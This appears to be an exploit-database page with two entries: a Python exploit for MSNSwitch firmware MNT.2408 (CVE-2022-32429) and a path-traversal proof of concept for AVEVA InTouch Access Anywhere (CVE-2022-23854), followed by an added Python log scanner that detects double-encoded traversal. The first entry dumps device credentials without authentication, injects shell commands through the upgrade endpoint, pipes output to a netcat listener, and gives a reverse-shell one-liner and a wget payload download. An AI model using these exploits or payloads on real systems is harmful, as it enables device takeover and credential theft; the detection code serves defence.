<pre><code>Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Execution (RCE)<br />Google Dork: n/a<br />Date: 9/1/2022<br />Exploit Author: Eli Fulkerson<br />Vendor Homepage: https://www.msnswitch.com/<br />Version: MNT.2408<br />Tested on: MNT.2408 firmware<br />CVE: CVE-2022-32429<br /><br />#!/usr/bin/python3<br /><br /><br />"""<br /><br />POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.<br /><br />Configuration dump only requires HTTP access.<br />Full RCE requires you to be on the same subnet as the device.<br /><br />"""<br /><br />import requests<br />import sys<br />import urllib.parse<br />import readline<br />import random<br />import string<br /><br /><br /># listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST<br />LISTENER_HOST = "192.168.EDIT.ME"<br />LISTENER_PORT = 3434<br /><br /># target msnswitch<br />TARGET = "192.168.EDIT.ME2"<br />PORT = 80<br /><br />USERNAME = None<br />PASSWORD = None<br /><br />"""<br />First vulnerability, unauthenticated configuration/credential dump<br />"""<br />if USERNAME is None or PASSWORD is None:<br />    # lets just ask<br />    hack_url = f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"<br />    session = requests.session()<br /><br />    data = session.get(hack_url)<br />    for each in data.text.split('\n'):<br />        key = None<br />        val = None<br /><br />        try:<br />            key = each.strip().split('=')[0]<br />            val = each.strip().split('=')[1]<br />        except IndexError:<br />            pass<br /><br />        if key == "Account1":<br />            USERNAME = val<br />        if key == "Password1":<br />            PASSWORD = val<br /><br />"""<br />Second vulnerability, authenticated command execution<br /><br />This only works on the local lan.<br /><br />for full reverse shell, modify and upload netcat busybox shell script to /tmp:<br /><br />    shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f<br />    download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp<br /><br />ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox<br />"""<br /><br />session = requests.session()<br /><br /># initial login, establishes our Cookie<br />burp0_url = f"http://{TARGET}:{PORT}/goform/login"<br />burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}<br />burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}<br />session.post(burp0_url, headers=burp0_headers, data=burp0_data)<br /><br /># get our csrftoken<br />burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"<br />data = session.get(burp0_url)<br /><br />csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]<br /><br />while True:<br />    CMD = input('x:')<br />    CMD_u = urllib.parse.quote_plus(CMD)<br />    filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))<br /><br />    try:<br />        hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F(unknown)%3F&csrftoken={csrftoken}"<br /><br />        session.get(hack_url, timeout=0.01)<br />    except requests.exceptions.ReadTimeout:<br />        pass<br /><br /></code></pre>
<pre><code>Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal<br />Exploit Author: Jens Regel (CRISEC IT-Security)<br />Date: 11/11/2022<br />CVE: CVE-2022-23854<br />Version: Access Anywhere Secure Gateway versions 2020 R2 and older<br /><br />Proof of Concept:<br />GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1<br /><br />HTTP/1.1 200 OK<br />Server: EricomSecureGateway/8.4.0.26844.*<br />(..)<br /><br />; for 16-bit app support<br />[fonts]<br />[extensions]<br />[mci extensions]<br />[files]<br />[Mail]<br />MAPI=1<br /><br /></code></pre>
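The request in the proof of concept above is double percent-encoded: `%252e` decodes to `%2e`, which only on a second pass becomes `.`, and `%255c` likewise becomes a backslash. A filter or detection rule that decodes once and looks for `..` therefore never sees the traversal. As an added example, not code from this advisory or from the product, the following Python decodes a request path until it stops changing, normalises backslashes to forward slashes, and reports traversal together with the number of decoding rounds it took, which is itself a useful signal in access-log review. The log line format, the client addresses and the benign and single-encoded sample lines are constructed for the demonstration; the traversal path is built in the shape of the proof of concept.

```python
import re
from urllib.parse import unquote

# Bound the decode loop; a path that still changes after this many rounds is suspicious by itself.
MAX_DECODE_ROUNDS = 5

# Constructed access-log shape: client "METHOD path HTTP/x.y" status
LOG_RE = re.compile(r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})$')


def fully_decode(path, max_rounds=MAX_DECODE_ROUNDS):
    """Percent-decode repeatedly until a fixed point; returns (decoded, rounds_used)."""
    current, rounds = path, 0
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def classify_path(path):
    """Classify one request path for upward directory traversal after full decoding."""
    decoded, rounds = fully_decode(path)
    normalized = decoded.replace("\\", "/")   # Windows targets accept both separators
    dotdot = normalized.split("/").count("..")
    return {
        "traversal": dotdot > 0,
        "dotdot_segments": dotdot,
        "decode_rounds": rounds,
        "double_encoded": rounds > 1,
        "normalized": normalized,
    }


def scan_access_log(lines):
    """Return (client, raw_path, verdict) for every log line whose path traverses upward."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        verdict = classify_path(m.group("path"))
        if verdict["traversal"]:
            alerts.append((m.group("client"), m.group("path"), verdict))
    return alerts


# Traversal path in the shape of the proof of concept (ten encoded "..\" steps), plus
# constructed benign and single-encoded requests.
POC_PATH = "/AccessAnywhere/" + "%252e%252e%255c" * 10 + "windows%255cwin.ini"
SAMPLE_LOG = [
    '203.0.113.7 "GET /AccessAnywhere/index.html HTTP/1.1" 200',
    '203.0.113.7 "GET ' + POC_PATH + ' HTTP/1.1" 200',
    '198.51.100.9 "GET /AccessAnywhere/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404',
]

if __name__ == "__main__":
    for client, path, verdict in scan_access_log(SAMPLE_LOG):
        print(client, verdict["decode_rounds"], "round(s)", verdict["normalized"])
```

On the gateway side the same rule applies in reverse: canonicalise the path to a fixed point before any authorisation or file-system check, then reject anything that still escapes the document root. A 200 response to such a request, as in the proof of concept, is the detection you do not want to be the first to see.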